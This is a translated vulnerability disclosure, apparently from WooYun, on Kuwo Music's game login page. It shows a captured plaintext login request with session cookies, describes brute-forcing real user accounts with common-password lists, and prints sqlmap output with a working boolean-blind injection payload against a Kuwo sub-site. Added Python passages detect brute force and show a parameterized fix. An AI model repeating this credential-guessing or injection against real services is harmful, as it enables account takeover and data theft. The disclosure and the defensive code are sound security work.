
Kuwo Music: improper login handling on a main-site system allows brute forcing, the interface needs fixing (cases provided, plus one SQL injection on a sub-site). Website security share!

As titled: improper login handling on a Kuwo Music main-site system allows brute forcing (cases provided), plus one SQL injection and a sensitive information leak on a sub-site.

WooYun: Kuwo Music www main site has a SQL injection with root privileges

Round two.


http://game.kuwo.cn/g/st/NewerIndex_2014

Login page:

http://game.kuwo.cn/g/st/WulinLogin

Login form fields: Username, Password, Captcha, and a "Forgot password" link.

Took a look.

It actually transmits the credentials in plaintext.

Look at the request data:

POST /g/st/WulinLogin HTTP/1.1
Host: game.kuwo.cn
Proxy-Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://game.kuwo.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 2345Explorer/6.5.0.11018
Content-Type: application/x-www-form-urlencoded
Referer: http://game.kuwo.cn/g/st/WulinLogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
COOKIE: JSESSIOnID=318C7DF8B77199FAFBC38546A5126295.jvm1; mzcgid=108; mzcuid=kwg_581878826_mzc; mzcsid=326; mzcguid=581878826; gadtype=""; gadposition=""; Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1451385640,1451446566,1452392626,1453428937; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1453957944; Hm_lvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; Hm_lpvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; rec_usr=1453958461525x893_0_1453958461525; r3=y; __utmt=1; __utma=18026403.1373377312.1453958462.1453958462.1453958462.1; __utmb=18026403.1.10.1453958464; __utmc=18026403; __utmz=18026403.1453958462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www_game_popup=show_www_game

fromwhere=wulin&username=24324353&password=123456&code=DCOA&tm=50

The password goes over in plaintext.

A brute-force run turned up a surprising number of username/password pairs.

The password used was just 123456.

After that it was run with the top 500 and top 1000 password lists.

Sample logins (screenshots in the original post):
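The brute force above works because the login endpoint accepts unlimited attempts and gives no signal to the defender. As an added example (not from the original post), here is detection logic over constructed login-log lines that flags the two patterns described: one password tried across many usernames from one source (spraying, the 123456 run), and many attempts against one username (the top-500/1000 run). The log format, IP addresses and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (assumed format, not real traffic):
# "<iso time> <client ip> POST /g/st/WulinLogin user=<name> result=ok|fail"
SAMPLE_LOG = """\
2016-01-28T13:10:01 203.0.113.7 POST /g/st/WulinLogin user=24324353 result=fail
2016-01-28T13:10:02 203.0.113.7 POST /g/st/WulinLogin user=24324354 result=fail
2016-01-28T13:10:02 203.0.113.7 POST /g/st/WulinLogin user=24324355 result=fail
2016-01-28T13:10:03 203.0.113.7 POST /g/st/WulinLogin user=24324356 result=fail
2016-01-28T13:10:04 203.0.113.7 POST /g/st/WulinLogin user=24324357 result=fail
2016-01-28T13:11:00 198.51.100.9 POST /g/st/WulinLogin user=alice result=fail
2016-01-28T13:11:10 198.51.100.9 POST /g/st/WulinLogin user=alice result=fail
2016-01-28T13:11:20 198.51.100.9 POST /g/st/WulinLogin user=alice result=fail
2016-01-28T13:11:30 198.51.100.9 POST /g/st/WulinLogin user=alice result=fail
2016-01-28T13:11:40 198.51.100.9 POST /g/st/WulinLogin user=alice result=fail
2016-01-28T13:11:50 198.51.100.9 POST /g/st/WulinLogin user=alice result=ok
2016-01-28T13:12:00 192.0.2.5 POST /g/st/WulinLogin user=bob result=fail
2016-01-28T13:12:30 192.0.2.5 GET /g/st/NewerIndex_2014
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) POST /g/st/WulinLogin "
                     r"user=(?P<user>\S+) result=(?P<res>ok|fail)$")

def parse_events(log_text):
    """Yield (time, ip, user, result) for login lines; anything else is skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["res"]

def detect(log_text, window=timedelta(seconds=60), spray_users=5, brute_tries=5):
    """Sliding window over failed logins per source IP. Returns a dict keyed
    ("password_spray", ip) or ("brute_force", ip, user) -> peak count in a window."""
    alerts = {}
    recent = defaultdict(list)  # ip -> [(time, user)] failures still inside the window
    for ts, ip, user, res in sorted(parse_events(log_text)):
        if res != "fail":
            continue  # successes do not count toward either pattern
        fails = recent[ip]
        fails.append((ts, user))
        while ts - fails[0][0] > window:  # expire failures older than the window
            fails.pop(0)
        distinct = {u for _, u in fails}
        if len(distinct) >= spray_users:
            alerts[("password_spray", ip)] = max(alerts.get(("password_spray", ip), 0), len(distinct))
        hits = Counter(u for _, u in fails)[user]
        if hits >= brute_tries:
            alerts[("brute_force", ip, user)] = max(alerts.get(("brute_force", ip, user), 0), hits)
    return alerts
```

On the constructed sample, 203.0.113.7 trips the spray rule (five distinct usernames in under a minute) and 198.51.100.9 trips the brute-force rule against alice, while bob's single failure followed by success raises nothing.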
Bonus: one injection.

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:15

[13:13:15] [INFO] testing connection to the target url
[13:13:15] [INFO] testing if the url is stable, wait a few seconds
[13:13:16] [INFO] url is stable
[13:13:16] [INFO] testing if GET parameter 'id' is dynamic
[13:13:17] [WARNING] GET parameter 'id' appears to be not dynamic
[13:13:17] [WARNING] reflective value(s) found and filtering out
[13:13:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[13:13:17] [INFO] testing for SQL injection on GET parameter 'id'
[13:13:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:13:19] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:13:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:13:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:13:19] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[13:13:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:13:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[13:13:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:13:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 55 HTTP(s) requests:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32 AND 5283=5283

[13:13:38] [INFO] testing MySQL
[13:13:39] [INFO] confirming MySQL
[13:13:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.2
[13:13:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 48 times
[13:13:40] [INFO] fetched data logged to text files under 'C:\Users\dell-pc\AppData\Local\Temp\HZ$D07~1.789\HZ$D07~1.790\SQLMAP~1\Bin\output\h.kuwo.cn'

[*] shutting down at 13:13:40

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:54

Usage: C:\Users\dell-pc\AppData\Local\Temp\HZ$D07~1.789\HZ$D07~1.790\SQLMAP~1\Bin\SqlMap.exe [options]
SqlMap.exe: error: no such option: --current-dbs
Press Enter to continue...

[*] shutting down at 13:13:55

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:14:11

[13:14:12] [INFO] resuming back-end DBMS 'mysql'
[13:14:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32 AND 5283=5283

[13:14:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[13:14:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns
[13:14:12] [INFO] fetching current database


Solution:

Fix the interface.
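What "fix the interface" means for the injection point sqlmap reported, as an added example that is not part of the original report: the boolean-blind payload it found (id=32 AND 5283=5283) reproduced against a constructed in-memory SQLite table standing in for the MySQL backend, beside a fixed lookup that validates the id and binds it as a query parameter. The table, its rows and the function names are made up for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the real MySQL backend (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE game (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO game VALUES (?, ?)", [(31, "alpha"), (32, "beta"), (33, "gamma")])
    return db

def lookup_vulnerable(db, raw_id):
    """The bug: the GET parameter is pasted into the SQL text, so '32 AND 5283=5283'
    returns the row while '32 AND 5283=5284' returns nothing (a boolean-blind oracle)."""
    return [r[0] for r in db.execute("SELECT name FROM game WHERE id=" + raw_id)]

def lookup_fixed(db, raw_id):
    """The fix: reject anything that is not a plain integer, then bind the value
    as a query parameter so it can never become part of the SQL grammar."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    return [r[0] for r in db.execute("SELECT name FROM game WHERE id=?", (int(raw_id),))]

def blind_oracle_works(lookup):
    """True if the two payloads give different answers, i.e. the lookup leaks one bit per request."""
    db = make_db()
    try:
        return lookup(db, "32 AND 5283=5283") != lookup(db, "32 AND 5283=5284")
    except ValueError:
        return False  # input rejected before it reaches the database
```

Run through blind_oracle_works, the vulnerable lookup answers the two payloads differently (that difference is exactly what sqlmap's 55 requests measured), while the fixed lookup rejects both before any query is issued.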